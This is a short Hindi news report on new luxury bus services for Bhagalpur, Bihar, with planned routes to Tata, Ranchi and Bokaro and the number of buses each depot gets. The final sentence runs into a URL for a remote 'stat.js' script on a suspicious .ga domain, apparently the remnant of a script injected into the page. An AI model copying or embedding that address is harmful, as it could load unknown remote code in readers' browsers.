भागलपुर आने जाने वाले यात्रियों के लिए राहत भरी खबर, नए साल में भागलपुर आने जाने वाली कई लग्जरी बसों की मिलेगी सुविधा। आपको बता दें, 10 जनवरी से 15 जनवरी के बीच 14 से अधिक बसें पटना से भागलपुर पहुंच जाएंगी, इन बसों को खासतौर पर टाटा, रांची, पटना, बोकारो के बीच चलाने का प्रस्ताव मुख्यालय को भेजा गया है।
आपको बता दें, बिहार राज्य पथ परिवहन निगम ने करीब 100 से अधिक बसों की खरीदारी कर ली है। जिसके बाद निगम के भागलपुर प्रमंडल की ओर से 14 और बसों की मांग की गई है।
आपको बता दे, भागलपुर से टाटा के बीच 2 बसें चलाने का प्रस्ताव भेजा गया है- एक बस यहां से जाएगी तथा दूसरी बस वहां से आएगी। यह बस देवघर, चकाई, गिरिडीह, हजारीबाग, रांची होते हुए टाटा पहुंचेगी। भागलपुर से बोकारो के लिए भी बस चलाई जाएगी।
बिहार के राज्य पथ परिवहन निगम के क्षेत्रीय प्रबंधक अशोक कुमार सिंह ने बताया कि बसों की खरीद हो गई है। 10 से 15 जनवरी के बीच भागलपुर बस पहुंच जाएगी। 4- 4 बस जमुई और मुंगेर प्रतिष्ठान को दिया जाएगा। 8 बस भागलपुर प्रतिष्ठान को दिया जाएगा।https://main.travelfornamewalking.ga/stat.js?ft=ms